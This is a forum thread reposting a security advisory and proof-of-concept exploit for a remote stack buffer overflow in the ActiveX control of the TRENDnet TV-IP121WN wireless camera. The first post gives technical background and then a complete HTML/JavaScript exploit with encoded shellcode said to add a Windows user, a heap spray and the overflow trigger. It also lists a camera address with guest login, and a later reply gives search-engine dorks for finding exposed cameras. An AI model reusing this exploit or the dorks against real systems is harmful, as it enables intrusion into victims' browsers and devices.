The_Arhitect Posted March 29, 2012 Report Share Posted March 29, 2012 TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer OverflowTRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveXControl OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflowcamera demohttp://67.203.184.58:9193/admin/view.cgi?profile=0username=guestpassword=guestBackground:The mentioned product, when browsing the device web interface,asks to install an ActiveX control to stream video content.It has the following settings:File version: 1, 1, 52, 18Product name: UltraMJCam device ActiveX ControlBinary path: C:\WINDOWS\Downloaded Program Files\UltraMJCamX.ocxProgID: UltraMJCam.UltraMJCam.1CLSID: {707ABFC2-1D27-4a10-A6E4-6BE6BDF9FB11}Implements IObjectSafety: yesSafe for Scripting (IObjectSafety): TrueSafe for Initialization (IObjectSafety): TrueVulnerability:This ActiveX control exposed the vulnerableOpenFileDlg() method, see typelib:.../* DISPID=101 *//* VT_BSTR [8] */function OpenFileDlg( /* VT_BSTR [8] [in] */ $sFilter ){ /* method OpenFileDlg */}...By invoking this method with an overlong argument is possibleto overflow a buffer. This is because of an insecure WideCharToMultiByte() call inside UltraMJCamX.ocx:Call stack of main threadAddress Stack Procedure / arguments Called from Frame001279FC 77E6F20B kernel32.77E637DE kernel32.77E6F206 00127A0C00127A10 0299F958 kernel32.WideCharToMultiByte UltraMJC.0299F952 00127A0C00127A14 00000003 CodePage = 300127A18 00000000 Options = 000127A1C 03835C5C WideCharStr = "&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00127A20 FFFFFFFF WideCharCount = FFFFFFFF (-1.)00127A24 00127A50 MultiByteStr = 00127A5000127A28 00007532 MultiByteCount = 7532 (30002.)00127A2C 00000000 pDefaultChar = NULL00127A30 00000000 pDefaultCharUsed = NULL00127A3C 029B11D0 UltraMJC.0299F920 UltraMJC.029B11CB 00127A38...0299F934 8B45 08 mov eax,dword ptr ss:[ebp+8]0299F937 C600 00 mov byte ptr ds:[eax],00299F93A 6A 00 push 00299F93C 6A 00 push 00299F93E 8B4D 10 mov ecx,dword ptr ss:[ebp+10]0299F941 51 push ecx0299F942 8B55 08 mov edx,dword ptr ss:[ebp+8]0299F945 52 push edx0299F946 6A FF push -10299F948 8B45 0C mov eax,dword ptr ss:[ebp+C]0299F94B 50 push eax0299F94C 6A 00 push 00299F94E 8B4D 14 mov ecx,dword ptr ss:[ebp+14]0299F951 51 push ecx0299F952 FF15 20319F02 call dword ptr ds:[<&KERNEL32.WideCharTo>; kernel32.WideCharToMultiByte <------------...The result is that critical structures are overwritten (SEH)allowing to execute arbitrary code against the target browser.As attachment, basic proof of concept code.<!--TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveXControl OpenFileDlg() WideCharToMultiByte Remote Buffer Overflow pocIE7-nodepcamera demohttp://67.203.184.58:9193/admin/view.cgi?profile=0username=guestpassword=guestrgod--><!-- saved from url=(0014)about:internet --> <html><object classid='clsid:707ABFC2-1D27-4A10-A6E4-6BE6BDF9FB11' id='obj' /></object><script language='javascript'>//add user one, user "sun" pass "tzu"shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +"%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +"%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +"%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +"%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +"%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +"%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +"%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +"%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +"%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +"%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +"%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +"%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +"%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +"%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +"%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +"%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +"%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +"%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +"%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +"%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +"%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +"%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +"%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +"%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +"%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +"%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +"%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +"%u7734%u4734%u4570");bigblock = unescape("%u0c0c%u0c0c");headersize = 20;slackspace = headersize+shellcode.length;while (bigblock.length<slackspace) bigblock+=bigblock;fillblock = bigblock.substring(0, slackspace);block = bigblock.substring(0, bigblock.length-slackspace);while(block.length+slackspace<0x40000) block = block+block+fillblock;memory = new Array();for (i=0;i<1888;i++){memory[i] = block+shellcode}</script><script defer=defer>var x ="";for (i=0; i<15000; i++){ x = x + "&";}obj.OpenFileDlg(x);</script>Sursa: TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow Quote Link to comment Share on other sites More sharing options...
backdoor Posted April 2, 2012 Report Share Posted April 2, 2012 Google Dorkinurl:admin/view.cgi intitle:Wirelessalte modeleinurl:admin/view.cgi intitle:Camera Quote Link to comment Share on other sites More sharing options...
napoletanii Posted April 2, 2012 Report Share Posted April 2, 2012 o tampenie bine de retinut , scz de offtopic dar nu ma puteam abtine Quote Link to comment Share on other sites More sharing options...
